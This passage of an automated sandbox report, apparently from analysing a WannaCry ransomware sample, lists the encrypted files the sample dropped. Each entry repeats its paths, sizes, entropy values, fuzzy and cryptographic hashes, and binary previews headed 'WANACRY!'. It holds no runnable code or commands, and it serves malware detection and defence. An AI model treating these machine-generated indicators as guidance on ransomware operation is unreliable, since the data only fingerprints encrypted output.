                                                                                      SSDEEP:24:bkN6tX+LOYYvdILfZ0HmBOBoIveFiBcDaFDANp6/52kAgPI/T4aZ1ej1y:bkN6tX+BfZ0ACmw0rgw4aZM5y
                                                                                      MD5:2FF65415C4D65EC57784782910E8E9C4
                                                                                      SHA1:1A721161B788A761B19DA930B94BD32960FFA325
                                                                                      SHA-256:842CA4ADDAC596B20CD3F22BDE23E27A12DA04D1D40F44BD5935A8FD8B533B9C
                                                                                      SHA-512:F98CA8D0072B3661EEE5EFEE6C09EBC072F0A46FA92D1E8D6ECF4F5C5A65411193E5E6F30716DB42DFA0C510FA053CA410A8C2947C9042E315D9116360BC6E97
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....!3....#[....S..E.>...n....-@.....j.A;l...#...?.W..b..k...:'h..K.*<U...s.*.a}..=.q.>...j.b..n#......W.;.^^..".,....po.._QT.......7.....4.+e$..s@.-&&"..i"...@.&un..eyD.K.x......d.{...H.kL......M....x3&.sCx.f...H^./.....h.R...bj....R8.% ...!.............,.bq%.4E...^...v.vg..'..L=.y&....+Z..z<...hT.kg.+!K.:.J.....6..h..../A;.C.nJ.k%...$....k.}...#.Ux5....G.....e.2~..Y...uF..TX.h.}g..K...c....Kb...I.Si..:s.J..b0...W...IW98...x9....$.Y.2.c.zp..zEH..x#]<O./A&T\.6../..x...\m,.k.H....2.Q./=/...`.E.$.D..C\.r...;!..G...a..7....,.+......l.._B.t.l......~..}......7...z...*W.0.(N...L$.l=X4..J.. .g.`.p...G.g......cX,...'...G...A..R....2...h.._`3...>....6..."....U....Mt...s..W.:./X..c,..l.....p..1.c.8.}.....Al.<4.!{.=_.`F..z..UmOBS.......Ve..F.........@\On..4N/.z....gG9.............uI..+. ..~.`;.ybe......p*...ew..Io.....bFd\...@S....`.~.......Y.............y..QZA...K...5..MX ..*Y..N....uS......).......0..Ov..K.Z&.\..>.......r...r..a.W...x
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.843962949282315
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkqiwyGZ+WJizffa+TUaWCOuetOeoCCEVJlkdfLbrO7Bhn5x8mIo:bkq7Azfi+ov6yyJEVJl0zODn5x8mP
                                                                                      MD5:186614EB7B1220F38E6CB342D25E2440
                                                                                      SHA1:7289568125989E926984FD5E5FAC526F7272D409
                                                                                      SHA-256:43CE28F102D2BFA7323A6D6BAD2F96090C127152D9DA28F684BB083B6C38B7ED
                                                                                      SHA-512:98D4642646B7301FA26B107F932CB783F87DF9A87B05602C66EEC64F214F3AC1EFD1CBD996048E13110AA6DB90FBB4E1E955F127C5A6A98262D2A24D1AC7DD40
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....!....Z....$..8.b(..C.n..{.........hx..F.=..t.L...5...,......k3....r;.:.Nz.t/..+.G...N.z.m.)....4.Y..z.%.!.......Yshwp'(+....,.[|......i...Op..%.(;+.(..7`LK.........W..T...9..I..."j...R.....&...t.7..EK..".8E.j..H.mL.@..T..3...,..8q.,._A..EL..j.k..Fd.............:.R2.e.,.E..Q.....##...~..5..%..'.R}...]........9..oG.%.>.7.1."PL.z......[...Q. 2...`7....IV..k....1.l..\*/.}.IJ...m..`._..z....-.b.$...%...[tDbuT.~.q<~.d..#.t.ic~i.4.J......D.x.r....E[;[.)p.....d.........h.....r.od).....P..N....K~d....7......%j.`...z.......?._Nf,..r....]./...$a...j..#5..:.\..W.X.H5..jW.k='..^.K.4......$.........R...t........q{..p......_.a5<...S..e..S...r+.R.~4..o3.vF....M..[s.d..x....$....7.k..*D..5m...(q.<...x.Q..-<..rO.R,........~..3....gbbp.<...aeH...1.q..mO.....<..A..$4zij.&....V..@:U.G.3Xk.1.T'.C.ujf.^t...+.VD..PB...) |..Ao..,z...,K.k."Hh...T ...u.uI)S_c.......Hw"..w,..3....U...9\@....t....fO.m.s\0..#....T. .KHt..........l.1.N....6."..$Z.C....Vw)...Xs^$.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.843962949282315
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkqiwyGZ+WJizffa+TUaWCOuetOeoCCEVJlkdfLbrO7Bhn5x8mIo:bkq7Azfi+ov6yyJEVJl0zODn5x8mP
                                                                                      MD5:186614EB7B1220F38E6CB342D25E2440
                                                                                      SHA1:7289568125989E926984FD5E5FAC526F7272D409
                                                                                      SHA-256:43CE28F102D2BFA7323A6D6BAD2F96090C127152D9DA28F684BB083B6C38B7ED
                                                                                      SHA-512:98D4642646B7301FA26B107F932CB783F87DF9A87B05602C66EEC64F214F3AC1EFD1CBD996048E13110AA6DB90FBB4E1E955F127C5A6A98262D2A24D1AC7DD40
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....!....Z....$..8.b(..C.n..{.........hx..F.=..t.L...5...,......k3....r;.:.Nz.t/..+.G...N.z.m.)....4.Y..z.%.!.......Yshwp'(+....,.[|......i...Op..%.(;+.(..7`LK.........W..T...9..I..."j...R.....&...t.7..EK..".8E.j..H.mL.@..T..3...,..8q.,._A..EL..j.k..Fd.............:.R2.e.,.E..Q.....##...~..5..%..'.R}...]........9..oG.%.>.7.1."PL.z......[...Q. 2...`7....IV..k....1.l..\*/.}.IJ...m..`._..z....-.b.$...%...[tDbuT.~.q<~.d..#.t.ic~i.4.J......D.x.r....E[;[.)p.....d.........h.....r.od).....P..N....K~d....7......%j.`...z.......?._Nf,..r....]./...$a...j..#5..:.\..W.X.H5..jW.k='..^.K.4......$.........R...t........q{..p......_.a5<...S..e..S...r+.R.~4..o3.vF....M..[s.d..x....$....7.k..*D..5m...(q.<...x.Q..-<..rO.R,........~..3....gbbp.<...aeH...1.q..mO.....<..A..$4zij.&....V..@:U.G.3Xk.1.T'.C.ujf.^t...+.VD..PB...) |..Ao..,z...,K.k."Hh...T ...u.uI)S_c.......Hw"..w,..3....U...9\@....t....fO.m.s\0..#....T. .KHt..........l.1.N....6."..$Z.C....Vw)...Xs^$.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.822799867523764
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkRwIS5LfxBTBD2VOaZb6owa3Ep5kBkUC6OLMm6a3F1Q/uEVGHxVSNK/xqDC:bkOR/QVOIb6owBkBHCCm6a3nEVlNkxqG
                                                                                      MD5:29182DA1304F0F164F9BC261093DAD9A
                                                                                      SHA1:428A014C601CC33D0B7E49BCCD1D2A5E742999D6
                                                                                      SHA-256:B34A2103DB7A84F862BA3E0BEF9E7F394C6B740BE19815472D70D2D0EFB22A10
                                                                                      SHA-512:33655C8A566E35422D278ED1C38B77730E803BD5DED015E1D8CD6E355EE1AA81A5F3D7FE4226DDEEFFC3B6E4EFD7E181A30F574F3FC440CF1D72C1A0E51600CD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........../.$.E...*..{..K.........p....."....F.S..v.K........W..&To.Q.......9....1m..ozG...~....{j....?O.`1.o......,V.|....nL./...:.~+.1g.2j.....A...O.bH1`G...rt{..\..`...3..o..qw.:\l.6..d.J\.a...}>...Fz6..u.;D..R.v.qp.P.8...+.v....pS....|=.]......}...................$...7.p..M.8...}N...6...A.f.%..".E.V..(..U...>.....L.#.`.FO%I.Z..*).+*af.q8.O.D4..A....l.Z....z.+......3z...;.wl....2.}.......,.C[.Z....f.X..p_...`.\S.(,.voT.K....a...@~v..3.. 5(..>.....t.dOn..:.[.X./.....|..8....i:..&/....}.ZZ.....(..q..q..W!/.........kPT.t...q.....o......l.hM.d.......v..acY....(.GbV*.....\..|....._,..x+.C..5`sd.S....=...g[...)%[..|.`.8=...J.C+)....~......N.hC#.T.....s.e....$..H..T.2*.2]..h..+.#.X;..jO...E.{d....O.../...Vz..y.h...P..{.w..xp.E..vp.QS....a.+.t.k...L.}..8.N.se.....wA[..m4-.u.r.d./..jq.....z{.......4)d....nVk..6...l.s...NS.".V8dSN..C.'.p..c>p..h.x.....).......9.<gB....;N\....Q..^5r.6..}...+.oa.@J.!k..H.D...Z.r..a.'.(Id..:....s5._...U..f
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.822799867523764
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkRwIS5LfxBTBD2VOaZb6owa3Ep5kBkUC6OLMm6a3F1Q/uEVGHxVSNK/xqDC:bkOR/QVOIb6owBkBHCCm6a3nEVlNkxqG
                                                                                      MD5:29182DA1304F0F164F9BC261093DAD9A
                                                                                      SHA1:428A014C601CC33D0B7E49BCCD1D2A5E742999D6
                                                                                      SHA-256:B34A2103DB7A84F862BA3E0BEF9E7F394C6B740BE19815472D70D2D0EFB22A10
                                                                                      SHA-512:33655C8A566E35422D278ED1C38B77730E803BD5DED015E1D8CD6E355EE1AA81A5F3D7FE4226DDEEFFC3B6E4EFD7E181A30F574F3FC440CF1D72C1A0E51600CD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........../.$.E...*..{..K.........p....."....F.S..v.K........W..&To.Q.......9....1m..ozG...~....{j....?O.`1.o......,V.|....nL./...:.~+.1g.2j.....A...O.bH1`G...rt{..\..`...3..o..qw.:\l.6..d.J\.a...}>...Fz6..u.;D..R.v.qp.P.8...+.v....pS....|=.]......}...................$...7.p..M.8...}N...6...A.f.%..".E.V..(..U...>.....L.#.`.FO%I.Z..*).+*af.q8.O.D4..A....l.Z....z.+......3z...;.wl....2.}.......,.C[.Z....f.X..p_...`.\S.(,.voT.K....a...@~v..3.. 5(..>.....t.dOn..:.[.X./.....|..8....i:..&/....}.ZZ.....(..q..q..W!/.........kPT.t...q.....o......l.hM.d.......v..acY....(.GbV*.....\..|....._,..x+.C..5`sd.S....=...g[...)%[..|.`.8=...J.C+)....~......N.hC#.T.....s.e....$..H..T.2*.2]..h..+.#.X;..jO...E.{d....O.../...Vz..y.h...P..{.w..xp.E..vp.QS....a.+.t.k...L.}..8.N.se.....wA[..m4-.u.r.d./..jq.....z{.......4)d....nVk..6...l.s...NS.".V8dSN..C.'.p..c>p..h.x.....).......9.<gB....;N\....Q..^5r.6..}...+.oa.@J.!k..H.D...Z.r..a.'.(Id..:....s5._...U..f
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.849237542257213
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkmmPWwZbSiADVg75W4eVKQYKLwxOYngFQPx64ClH25:bkm7sxA63gLejngq5IW5
                                                                                      MD5:2C843DD92DDDF062C4F96600E4C0687A
                                                                                      SHA1:5872707DBB67E9D502EC1DB493E3466ABF15369D
                                                                                      SHA-256:5052CDA9C1488CC9497C1BC3EA7AB74C0A870D7DD1AEDD40688CBC36AD05BEA7
                                                                                      SHA-512:95D4F1488A1FA5788E182DB74525237EDDCBFD5D247C4EF109C0C8AB812C2E5538334F46BA651B2247C6C7FBC69F18651BED59996AE6806E983ADEB5395077C5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........[.A...D.....^T:G..|...3o..:.T............VNpd.k/.o.>5..rz..E.HW<G.[.!BS.=...... .i"...Q...._.L._\`FR.....`.X.,..........(<.+.Z.sg....q;..f...S.......C.}6%.>r.}fAt:V<UdO..^...M. .Q^,;.|.v.Ji.....E ..H.....a.04..`..V..."2.^.6.l.M...i.-s.CG...)\J...............f..".O.=...w....D).<....<.a,:d...-......Yy.Wt.... TQ.#.Z.......^:...<a.......O&..!....o....~.{..{.X=j..~..!y.;.x..ir...s...J..SU...g....#.......!.Yo...C.d....G..1.U......D^.-.[..........sz.p...........9h....J...q...z.4t..w..2#.\..........D54.e....v\.F..3[...<bZ."g!ra..,...H...~.3.`"V..y.....D........J.(..=.q.jf...oH....G.....c%."....r.I^N..e.`.{...-......&....>..2.T?2.S+Y63q.u qN..h..u..{G.M#.(.....q......t9.R)....k.x.m.GS....u...\.4..@...d...y...T8Ra*}v@...u.5..../...._.*.lD...}T...!.T.6.....Zr.L}(.......6).oKs.[h..J"..xP8...4..`....a...bm,.....N........}...&......q.......7c.mt..j...a.xw......*u~E.m8.@..(A.R..v.&....c..u..."g...rxP.....G.In.YE.?. ........@..r.2.y../K..|
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.849237542257213
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkmmPWwZbSiADVg75W4eVKQYKLwxOYngFQPx64ClH25:bkm7sxA63gLejngq5IW5
                                                                                      MD5:2C843DD92DDDF062C4F96600E4C0687A
                                                                                      SHA1:5872707DBB67E9D502EC1DB493E3466ABF15369D
                                                                                      SHA-256:5052CDA9C1488CC9497C1BC3EA7AB74C0A870D7DD1AEDD40688CBC36AD05BEA7
                                                                                      SHA-512:95D4F1488A1FA5788E182DB74525237EDDCBFD5D247C4EF109C0C8AB812C2E5538334F46BA651B2247C6C7FBC69F18651BED59996AE6806E983ADEB5395077C5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........[.A...D.....^T:G..|...3o..:.T............VNpd.k/.o.>5..rz..E.HW<G.[.!BS.=...... .i"...Q...._.L._\`FR.....`.X.,..........(<.+.Z.sg....q;..f...S.......C.}6%.>r.}fAt:V<UdO..^...M. .Q^,;.|.v.Ji.....E ..H.....a.04..`..V..."2.^.6.l.M...i.-s.CG...)\J...............f..".O.=...w....D).<....<.a,:d...-......Yy.Wt.... TQ.#.Z.......^:...<a.......O&..!....o....~.{..{.X=j..~..!y.;.x..ir...s...J..SU...g....#.......!.Yo...C.d....G..1.U......D^.-.[..........sz.p...........9h....J...q...z.4t..w..2#.\..........D54.e....v\.F..3[...<bZ."g!ra..,...H...~.3.`"V..y.....D........J.(..=.q.jf...oH....G.....c%."....r.I^N..e.`.{...-......&....>..2.T?2.S+Y63q.u qN..h..u..{G.M#.(.....q......t9.R)....k.x.m.GS....u...\.4..@...d...y...T8Ra*}v@...u.5..../...._.*.lD...}T...!.T.6.....Zr.L}(.......6).oKs.[h..J"..xP8...4..`....a...bm,.....N........}...&......q.......7c.mt..j...a.xw......*u~E.m8.@..(A.R..v.&....c..u..."g...rxP.....G.In.YE.?. ........@..r.2.y../K..|
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.856874476311632
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkliNMn7ZJgJej2htS7Qj97SlNwkEmvpZzKqISVnQ3E+XlxyPxtt:bkliN2zg4yht2N3wyv7KqIX3HXlxEtt
                                                                                      MD5:F6B2A0685B27E705712DE1CE3E2EDAD5
                                                                                      SHA1:2CB03A155957A73EAB6EE24475E94D81E79C3149
                                                                                      SHA-256:B2494827383C03E3C646D151BAA4551FCE280EF24E59F78DDFEF7DF18F92D2BD
                                                                                      SHA-512:C4058993AAEA752649F6B3408C4952204DA417E5703F5888B4DB6D8AACE4592E642529DDB9FF010B8EA93274162CFB803DB800859E4DF948CF366BE02DDCFA80
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....9~->..]Z.M.@.,..!E.RC..)t.3BV`E.....:MSx.h.(.U..H.....;...N..b.........hX....8}A.V.4..E4rMU.^y...A.r..j6.p.",.)...k.. b...9k..@...x.....{D.k....V.J2.lh..A..kX3t...E...k..[.2.2..~....-...9z...J7vU..(.~<1....1Q[........I...Z.S%fHJ.q.a..v...xA. .Z.o.#..............|..8...n.-..;...s..zng..T..bt.o,.y4...J\...Z..Qw.-.>.<..A.R....5aaV.gV.[&..t......tk..N.,.<...*....f.,.6.1.!F.;........p...|9..6...u1p.p.H.....Y.....&(..}s.}r.*.5.E.(.=..l...`.....`.Kv.S....:X5......5t...r..5+.jg#.....s.......Z,u)~..i./.......[8%...T,.<l..hm3.....`..f.k.lv...^{........r?....P.<.Ct.a{O.x..n.N.&...g....].....R.0c..vE...!.|.7. ....J.....{..=c-)...W...p.4U..v.(~......<.....1.Wp...q.5..e3.....#....J[lPg...?..gO...C.......oQd..p..r...<........!.+.:"?>.l.%.+^..~8......#.......0..R.....+.......T.).....}.E..".MM....?V-$."........2m...@#..y#|i..~.h.-^$.....o`Kf.i.. 5.Hi{F..x.s...G.a.....&"...nJ.6L.E=.T..u....W1E..~..u.K.w...%+.Qz.Y.&..p..I....m.=.I../J.`....N.f".@m....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.856874476311632
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkliNMn7ZJgJej2htS7Qj97SlNwkEmvpZzKqISVnQ3E+XlxyPxtt:bkliN2zg4yht2N3wyv7KqIX3HXlxEtt
                                                                                      MD5:F6B2A0685B27E705712DE1CE3E2EDAD5
                                                                                      SHA1:2CB03A155957A73EAB6EE24475E94D81E79C3149
                                                                                      SHA-256:B2494827383C03E3C646D151BAA4551FCE280EF24E59F78DDFEF7DF18F92D2BD
                                                                                      SHA-512:C4058993AAEA752649F6B3408C4952204DA417E5703F5888B4DB6D8AACE4592E642529DDB9FF010B8EA93274162CFB803DB800859E4DF948CF366BE02DDCFA80
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....9~->..]Z.M.@.,..!E.RC..)t.3BV`E.....:MSx.h.(.U..H.....;...N..b.........hX....8}A.V.4..E4rMU.^y...A.r..j6.p.",.)...k.. b...9k..@...x.....{D.k....V.J2.lh..A..kX3t...E...k..[.2.2..~....-...9z...J7vU..(.~<1....1Q[........I...Z.S%fHJ.q.a..v...xA. .Z.o.#..............|..8...n.-..;...s..zng..T..bt.o,.y4...J\...Z..Qw.-.>.<..A.R....5aaV.gV.[&..t......tk..N.,.<...*....f.,.6.1.!F.;........p...|9..6...u1p.p.H.....Y.....&(..}s.}r.*.5.E.(.=..l...`.....`.Kv.S....:X5......5t...r..5+.jg#.....s.......Z,u)~..i./.......[8%...T,.<l..hm3.....`..f.k.lv...^{........r?....P.<.Ct.a{O.x..n.N.&...g....].....R.0c..vE...!.|.7. ....J.....{..=c-)...W...p.4U..v.(~......<.....1.Wp...q.5..e3.....#....J[lPg...?..gO...C.......oQd..p..r...<........!.+.:"?>.l.%.+^..~8......#.......0..R.....+.......T.).....}.E..".MM....?V-$."........2m...@#..y#|i..~.h.-^$.....o`Kf.i.. 5.Hi{F..x.s...G.a.....&"...nJ.6L.E=.T..u....W1E..~..u.K.w...%+.Qz.Y.&..p..I....m.=.I../J.`....N.f".@m....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.846069302807464
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk8cmQULi6/Kk4aysQJrgbPJ6gtxjM4l/GaerSbQ7EZ7hs9EhED:bkxULDK4wJrER3pz6e0878
                                                                                      MD5:4559DFA194C5EAC6CF96F9FD78C2F3A5
                                                                                      SHA1:C33A95853F2305B544225C2A9F590A648982682D
                                                                                      SHA-256:BA0BB75E8C015BB4F76A54B4C175A8A3BCCC7267CF24CE53EBF1FDF1EBFACD5F
                                                                                      SHA-512:68B55CE76F1209E11630E2CC37F4AB6FE10AC32934C5A43251AF208554DD9033D65D89DC18DF5E9727A1E9923B37F222AE61FC0F066F43D1C0DA8A568B5182F8
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....j...vu.O..A....b.u.\p..b..i.&B.e-H#.zCk~j..d..6.%.....p.......S.....+D...vJ.`.=C...+I...(c.T.@;.%@...'....B.........0.6V..:H..K.d.f.V..29W..p..5M..;P.K.....G.e.P..eR..h.J.yEp3...4.4.y.....E..F...c..#..Ko.6`5E.A...6.o.....E.l...K__d..W..D!...............B.iI......!.t.E.(.......r...|#c.<.R8OCS..X....lN,p."..-....{f8g..vw.OIG.$L...e.7......lpdHj...k?Lps.....S..v...Q...@..M\_|E....G>.Y...^e...=u.\..j....n.........I..,..6]..T....M.M[Y....;s...{...q..A../C,Th...B.X......... 0.>&5P$......A{x..C.;.z#]S..9.`...}....s.<R..%...u..7g9W.;.U..pW...k......oiT.......)V#..-...F|...C.l.).3.r.y..9.U.et....Sx.p.a...Op.b.O.0.$.....l....8p[BB'>.OkX..%4..!..f.=!.>......E.7t!.~|.y%.~...4x..'...........q-&z.!...bc.ev& ..f...$,.'..M..xC....,.Z.].o..K....V.1n,.ta.`h}-..F2G.V..{.&..!q...^.!.......L..Qk..W.o..f....e7..3uq.3..7.3wj.4..R.B....vb..S..]...-.........x..5....... }]..J....[..1,...(g..XcE.f..a.\..[..]i.aO..z.zc.#.j.6...(.N. .6......{.*..<
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.846069302807464
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bk8cmQULi6/Kk4aysQJrgbPJ6gtxjM4l/GaerSbQ7EZ7hs9EhED:bkxULDK4wJrER3pz6e0878
                                                                                      MD5:4559DFA194C5EAC6CF96F9FD78C2F3A5
                                                                                      SHA1:C33A95853F2305B544225C2A9F590A648982682D
                                                                                      SHA-256:BA0BB75E8C015BB4F76A54B4C175A8A3BCCC7267CF24CE53EBF1FDF1EBFACD5F
                                                                                      SHA-512:68B55CE76F1209E11630E2CC37F4AB6FE10AC32934C5A43251AF208554DD9033D65D89DC18DF5E9727A1E9923B37F222AE61FC0F066F43D1C0DA8A568B5182F8
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....j...vu.O..A....b.u.\p..b..i.&B.e-H#.zCk~j..d..6.%.....p.......S.....+D...vJ.`.=C...+I...(c.T.@;.%@...'....B.........0.6V..:H..K.d.f.V..29W..p..5M..;P.K.....G.e.P..eR..h.J.yEp3...4.4.y.....E..F...c..#..Ko.6`5E.A...6.o.....E.l...K__d..W..D!...............B.iI......!.t.E.(.......r...|#c.<.R8OCS..X....lN,p."..-....{f8g..vw.OIG.$L...e.7......lpdHj...k?Lps.....S..v...Q...@..M\_|E....G>.Y...^e...=u.\..j....n.........I..,..6]..T....M.M[Y....;s...{...q..A../C,Th...B.X......... 0.>&5P$......A{x..C.;.z#]S..9.`...}....s.<R..%...u..7g9W.;.U..pW...k......oiT.......)V#..-...F|...C.l.).3.r.y..9.U.et....Sx.p.a...Op.b.O.0.$.....l....8p[BB'>.OkX..%4..!..f.=!.>......E.7t!.~|.y%.~...4x..'...........q-&z.!...bc.ev& ..f...$,.'..M..xC....,.Z.].o..K....V.1n,.ta.`h}-..F2G.V..{.&..!q...^.!.......L..Qk..W.o..f....e7..3uq.3..7.3wj.4..R.B....vb..S..]...-.........x..5....... }]..J....[..1,...(g..XcE.f..a.\..[..]i.aO..z.zc.#.j.6...(.N. .6......{.*..<
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.861376553133674
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkVAlH1sRrCQZmN95vqXrVqqhFRagtKLaQzBSchWQezI4zFnmkuc7qU:bkmURFmN9tYVphFRaxe2BSE941KTU
                                                                                      MD5:7B80E6114CA16CE64DD9923EA95F80C9
                                                                                      SHA1:797BBBAE7341C53B65BD906D3B691D385C306F58
                                                                                      SHA-256:D0C30983A562CEC3ABD3F43319EC3152BD6A4C61D9F2CA3D9DAEEBFF9DA0E9B8
                                                                                      SHA-512:912A8E92F2BE2800C12E571B4B2ECFC3230E0681D291AB234C3E0DF61B1D8FD2DEE5D61580E9DBC35340C6DE6C5D08E95CC70416EDEA5E40B1DEDC31B4C2CD5E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........6w....}(kVS..Xw.LN.Q.+5^J=...t..>....[...;.....U4........1k.C*c..K.$...,..1(.?...E...1..3}..1..4_3f..cB.*...P......."}..k.X`...5.Yu.b.U...S...hW... .7..m.c.{.i%../..v,.Pb.K`.w.............:f.on.Xa...S.ux..K..o;2q.q9l\r..?%.q....<...:s.#..................H<.Vh.h.8.....?^h..K..q;;.)y..nP!.;....Jt-...^.r.s.X...~...8%.....GF.._.*..8;b....9>.*.1.....0.5.M .....'...D3.<j...&.R}}._u{D.E.T.,dg......,...*.{....^".0...2.c.M........L......FQE.Z.u.`~..u2.uyG..:..Z:.....a........U.{?..MW..<.d..%V.q..............H."....N.........(..hP.E6..a....?.rX9...n.bz;..N.E2@F...k.5)......O.%:d...Q.[z!...1y...e.M.6.~.g...M^.M.F"},.U3X...._.J......6;g..u...".....>L..B.1.a..(n.......Iq.hjr....VX....".r...red......pZt)m.....>...[g...F^.....[.$..e6.=.v.......&#?..+........'#.G..bn...6.....dZ2.~yI`V.1f....N.....`.eW~<c...!P.{........|...U...{...&.J.l....l.B.b{X.N.O.MF ..n.2......b.m$7...X...#.gr....-..4.t\?l.....fU.|.-..GR....I...W..:p(WPD.9R..H.e.a!-...C.N
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.861376553133674
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkVAlH1sRrCQZmN95vqXrVqqhFRagtKLaQzBSchWQezI4zFnmkuc7qU:bkmURFmN9tYVphFRaxe2BSE941KTU
                                                                                      MD5:7B80E6114CA16CE64DD9923EA95F80C9
                                                                                      SHA1:797BBBAE7341C53B65BD906D3B691D385C306F58
                                                                                      SHA-256:D0C30983A562CEC3ABD3F43319EC3152BD6A4C61D9F2CA3D9DAEEBFF9DA0E9B8
                                                                                      SHA-512:912A8E92F2BE2800C12E571B4B2ECFC3230E0681D291AB234C3E0DF61B1D8FD2DEE5D61580E9DBC35340C6DE6C5D08E95CC70416EDEA5E40B1DEDC31B4C2CD5E
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.........6w....}(kVS..Xw.LN.Q.+5^J=...t..>....[...;.....U4........1k.C*c..K.$...,..1(.?...E...1..3}..1..4_3f..cB.*...P......."}..k.X`...5.Yu.b.U...S...hW... .7..m.c.{.i%../..v,.Pb.K`.w.............:f.on.Xa...S.ux..K..o;2q.q9l\r..?%.q....<...:s.#..................H<.Vh.h.8.....?^h..K..q;;.)y..nP!.;....Jt-...^.r.s.X...~...8%.....GF.._.*..8;b....9>.*.1.....0.5.M .....'...D3.<j...&.R}}._u{D.E.T.,dg......,...*.{....^".0...2.c.M........L......FQE.Z.u.`~..u2.uyG..:..Z:.....a........U.{?..MW..<.d..%V.q..............H."....N.........(..hP.E6..a....?.rX9...n.bz;..N.E2@F...k.5)......O.%:d...Q.[z!...1y...e.M.6.~.g...M^.M.F"},.U3X...._.J......6;g..u...".....>L..B.1.a..(n.......Iq.hjr....VX....".r...red......pZt)m.....>...[g...F^.....[.$..e6.=.v.......&#?..+........'#.G..bn...6.....dZ2.~yI`V.1f....N.....`.eW~<c...!P.{........|...U...{...&.J.l....l.B.b{X.N.O.MF ..n.2......b.m$7...X...#.gr....-..4.t\?l.....fU.|.-..GR....I...W..:p(WPD.9R..H.e.a!-...C.N
